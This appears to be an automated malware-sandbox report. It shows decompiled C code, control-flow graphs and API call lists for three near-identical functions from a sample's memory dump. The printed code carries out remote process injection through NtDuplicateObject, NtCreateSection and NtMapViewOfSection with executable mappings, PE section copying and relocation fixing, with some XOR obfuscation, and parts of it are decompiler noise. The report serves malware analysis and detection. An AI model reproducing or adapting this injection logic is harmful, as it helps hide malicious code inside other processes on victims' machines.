                      control_flow_graph 200 4014b3-4014c4 202 4014db 200->202 203 4014cc-4014f1 call 40119e 200->203 202->203 207 4014f3 203->207 208 4014f6-4014fb 203->208 207->208 210 401501-401512 208->210 211 401824-40182c 208->211 214 401822 210->214 215 401518-401541 210->215 211->208 216 401831-401842 211->216 214->216 215->214 225 401547-40155e NtDuplicateObject 215->225 219 401845-401866 call 40119e 216->219 220 401838-40183e 216->220 220->219 225->214 227 401564-401588 NtCreateSection 225->227 229 4015e4-40160a NtCreateSection 227->229 230 40158a-4015ab NtMapViewOfSection 227->230 229->214 233 401610-401614 229->233 230->229 232 4015ad-4015c9 NtMapViewOfSection 230->232 232->229 235 4015cb-4015e1 232->235 233->214 234 40161a-40163b NtMapViewOfSection 233->234 234->214 236 401641-40165d NtMapViewOfSection 234->236 235->229 236->214 237 401663 call 401668 236->237
                      C-Code - Quality: 63%
                      			E004014B3(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				intOrPtr* _t165;
				void* _t168;
				long _t176;
				intOrPtr _t178;
				void* _t179;
				long* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
				void* _t194;
				void* _t195;
				intOrPtr* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				void* _t210;
				intOrPtr* _t211;
				void* _t212;
				long _t227;

				_t206 = _t205 + 1;
				_t84 = 0x14e3;
				_push(0x37f);
				_t130 =  *_t206;
				_t207 = _t206 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t87;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t185);
				_t90 =  *_t185;
				if(_t90 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t98, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t121 = _t203 - 0x44;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t121, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t123 = _t203 - 0x3c;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t123, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t100 = _t203 - 0x50;
						 *(_t100 + 4) = _t176;
						 *_t100 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						if(NtCreateSection(_t189, 0xe, _t176, _t100, 0x40, 0x8000000, _t176) == 0 &&  *(_t203 - 8) != 0) {
							 *_t46 =  *(_t203 - 0x50);
							_t102 = _t203 - 0x48;
							 *_t102 = _t176;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t102, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t104 = _t203 - 0x40;
								 *_t104 = _t176;
								_t227 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t104, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 0x20);
								if(_t227 == 0) {
									L20();
									if(_t227 == 0 && _t227 != 0) {
									}
									_t210 = _t207 + 4;
									_push(0x2e62);
									_t211 = _t210 + 4;
									_push(0x2260);
									_t106 =  *_t211;
									_t212 = _t211 + 4;
									_t161 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t162 = _t161;
									asm("loop 0xffffffc2");
									_t163 = _t162 ^ 0xbcc951dd;
									_t207 = _t212 - _t163;
									_t194 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
									_t139 =  *(_t194 + 6) & 0x0000ffff;
									_push(_t194);
									_t164 = _t194;
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_t165 = _t164 + 0xf8;
										__eflags = _t165;
									} else {
										_t165 = _t164 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t165 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t165 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t165 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
										_t207 = _t207 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t195);
									_t232 =  *((intOrPtr*)(_t203 - 0x34));
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_push(_t195);
										_t168 =  *((intOrPtr*)(_t195 + 0x34)) -  *(_t203 - 0x40);
										_t198 =  *((intOrPtr*)(_t195 + 0xa0)) +  *(_t203 - 0x48);
										__eflags = _t198;
										while(1) {
											__eflags =  *_t198;
											if( *_t198 == 0) {
												break;
											}
											_t178 =  *_t198;
											_t198 = _t198 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t168;
												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t178));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t199);
										_t176 = 0;
										__eflags = 0;
										_t108 = _t203 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t199 + 0x28)) +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t108, 0);
									} else {
										L53();
										_pop(_t179);
										_t176 = _t179 - 0x1760;
										 *((intOrPtr*)(_t176 + 0x1794)) = _t176 + 0x2c17;
										L00401227(_t128, _t176, _t232, _t176 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t176 + 0x17b9)) = _t176 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t207;
				return L0040119E(_t91, _t131, _t176, _t232);
			}















































                      0x004014b4
                      0x004014bc
                      0x004014cc
                      0x004014d1
                      0x004014d4
                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                      • Instruction ID: 39cbb5cf0de6fd42451f7104dd6b59036266353996c087b5e70b14ffae25b97f
                      • Opcode Fuzzy Hash: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                      • Instruction Fuzzy Hash: 29512971900245BFEB219F91CC49FEF7BB9EF85B00F10412AFA11AA2A5D7709941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 240 4014bf-4014c4 244 4014db 240->244 245 4014cc-4014f1 call 40119e 240->245 244->245 249 4014f3 245->249 250 4014f6-4014fb 245->250 249->250 252 401501-401512 250->252 253 401824-40182c 250->253 256 401822 252->256 257 401518-401541 252->257 253->250 258 401831-401842 253->258 256->258 257->256 267 401547-40155e NtDuplicateObject 257->267 261 401845-401866 call 40119e 258->261 262 401838-40183e 258->262 262->261 267->256 269 401564-401588 NtCreateSection 267->269 271 4015e4-40160a NtCreateSection 269->271 272 40158a-4015ab NtMapViewOfSection 269->272 271->256 275 401610-401614 271->275 272->271 274 4015ad-4015c9 NtMapViewOfSection 272->274 274->271 277 4015cb-4015e1 274->277 275->256 276 40161a-40163b NtMapViewOfSection 275->276 276->256 278 401641-40165d NtMapViewOfSection 276->278 277->271 278->256 279 401663 call 401668 278->279
                      C-Code - Quality: 62%
                      			E004014BF(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t183;
				intOrPtr* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				void* _t193;
				intOrPtr* _t196;
				void* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				asm("invalid");
				_t84 = 0x14e3;
				_push(0x37f);
				_t130 =  *_t203;
				_t204 = _t203 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
				_t183 = _t201 - 0x60;
				 *_t183 = _t174;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 = _t201 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t174;
					_t185 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_push(_t201 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t201 - 8) = _t174;
						_t98 = _t201 - 0x50;
						 *(_t98 + 4) = _t174;
						 *_t98 = 0x5000;
						_t186 = _t201 - 0x54;
						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t121 = _t201 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t201 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *(_t201 - 8) =  *(_t201 - 8) + 1;
								}
							}
						}
						_t100 = _t201 - 0x50;
						 *(_t100 + 4) = _t174;
						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t102 = _t201 - 0x48;
							 *_t102 = _t174;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t104 = _t201 - 0x40;
								 *_t104 = _t174;
								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
								if(_t224 == 0) {
									L21();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t159 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc2");
									_t161 = _t160 ^ 0xbcc951dd;
									_t204 = _t209 - _t161;
									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t139 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t162 = _t192;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t229 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t193);
										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
										__eflags = _t196;
										while(1) {
											__eflags =  *_t196;
											if( *_t196 == 0) {
												break;
											}
											_t176 =  *_t196;
											_t196 = _t196 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t197);
										_t174 = 0;
										__eflags = 0;
										_t108 = _t201 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
									} else {
										L54();
										_pop(_t177);
										_t174 = _t177 - 0x1760;
										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t174, _t229);
			}














































                      0x004014bf
                      0x004014bc
                      0x004014cc
                      0x004014d1
                      0x004014d4
                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                      • Instruction ID: 07d304ea65bb56911e0060c1c25482d61d12f4ba10f26ae25195bb01424c625b
                      • Opcode Fuzzy Hash: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                      • Instruction Fuzzy Hash: 345106B1900245BFEB219F91CC48FEBBBB9EF85B10F104129FA11AA2E5D7749941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014DA Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 282 4014da-4014f1 call 40119e 288 4014f3 282->288 289 4014f6-4014fb 282->289 288->289 291 401501-401512 289->291 292 401824-40182c 289->292 295 401822 291->295 296 401518-401541 291->296 292->289 297 401831-401842 292->297 295->297 296->295 306 401547-40155e NtDuplicateObject 296->306 300 401845-401866 call 40119e 297->300 301 401838-40183e 297->301 301->300 306->295 308 401564-401588 NtCreateSection 306->308 310 4015e4-40160a NtCreateSection 308->310 311 40158a-4015ab NtMapViewOfSection 308->311 310->295 314 401610-401614 310->314 311->310 313 4015ad-4015c9 NtMapViewOfSection 311->313 313->310 316 4015cb-4015e1 313->316 314->295 315 40161a-40163b NtMapViewOfSection 314->315 315->295 317 401641-40165d NtMapViewOfSection 315->317 316->310 317->295 318 401663 call 401668 317->318
                      C-Code - Quality: 62%
                      			E004014DA(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t183;
				intOrPtr* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				void* _t193;
				intOrPtr* _t196;
				void* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				_pop(_t84);
				_push(0x37f);
				_t130 =  *_t203;
				_t204 = _t203 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
				_t183 = _t201 - 0x60;
				 *_t183 = _t174;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 = _t201 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t174;
					_t185 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_push(_t201 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t201 - 8) = _t174;
						_t98 = _t201 - 0x50;
						 *(_t98 + 4) = _t174;
						 *_t98 = 0x5000;
						_t186 = _t201 - 0x54;
						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t121 = _t201 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t201 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *(_t201 - 8) =  *(_t201 - 8) + 1;
								}
							}
						}
						_t100 = _t201 - 0x50;
						 *(_t100 + 4) = _t174;
						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t102 = _t201 - 0x48;
							 *_t102 = _t174;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t104 = _t201 - 0x40;
								 *_t104 = _t174;
								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
								if(_t224 == 0) {
									L18();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t159 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc2");
									_t161 = _t160 ^ 0xbcc951dd;
									_t204 = _t209 - _t161;
									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t139 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
